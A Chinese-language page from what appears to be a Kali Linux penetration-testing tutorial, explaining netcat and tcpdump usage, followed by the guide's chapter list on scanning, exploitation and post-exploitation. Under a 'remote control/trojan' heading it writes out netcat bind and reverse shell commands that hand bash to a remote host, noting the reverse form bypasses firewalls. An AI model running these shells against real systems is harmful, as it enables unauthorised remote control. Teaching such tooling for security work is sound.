netcat简介
-----------
网络中的瑞士军刀--体积小,功能强大
侦听模式/传输模式
telnet连接(获取banner信息)
`nc -nv IP port //连接远程主机并获取banner`
传输文本信息(远程电子取证信息收集)
~~~
两台机器
A:nc -lp 666 > ps.txt
B:ps aux | nc -nv 192.168.1.11 666 -q 1
~~~
传输文件/目录
文件:
~~~
A:nc -lp 333 > xx.php (接收方)
B:nc -nv IP 333 < test.php -q 1
~~~
或者
~~~
A:nc -q 1 -l 333 < a.exe (发送方)
B:nc -nv IP 333 > 123.exe
~~~
目录:
~~~
A:tar -cvf - mulu/ | nc -lp 333 -q 1 //打包传输
B:nc -nv IP 333 | tar -xvf - //接收解包
~~~
加密传输文件
~~~
A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.exe (接收方)
B:mcrypt --flush -Fbqd -a rijndael-256 -m ecb < 0.exe | nc -nv IP 333 -q 1
~~~
远程控制/木马
正向:
~~~
A:nc -lp 333 -c bash (服务端主动开bash)
B:nc IP 333 (控制端)
~~~
反向:
~~~
A:nc -lp 333 (控制端)
B:nc IP 333 -c bash (绕过防火墙主动连接外部主机)
~~~
注:Windows用户把bash改成cmd
------------
TCPDUMP--抓包(Linux、Unix默认安装)
抓包:
默认只抓68个字节
~~~
tcpdump -i eth0 -s 0 -w file.pcap
tcpdump -i eth0 port 22
~~~
读取抓包文件
`tcpdump -r file.pcap`
- 序言
- kali-Linux基本配置
- 忘记Root密码
- 更新系统和软件包
- Bash命令
- shell编程
- Linux的文件权限配置
- Linux日志文件
- 信息收集
- 被动信息收集
- 绕过CDN找真实IP
- IDS识别
- p0f-OS识别
- nmap端口扫描
- 搜索引擎
- 内网主机发现
- 使用SET社工包钓鱼
- 漏洞发现
- Nessus策略漏扫
- AWVS集成漏扫
- w3af
- 其它漏扫
- 抓包改包
- Burpsite
- Fiddler
- Wireshark
- 漏洞利用
- Hydra爆破
- SQLmap
- Metasploit
- Beef
- antSwrod
- XSS前端工具
- Windows缓冲区溢出
- 后漏洞利用阶段
- 免杀一句话
- 上传工具
- 嗅探
- 本地提取
- 隐藏痕迹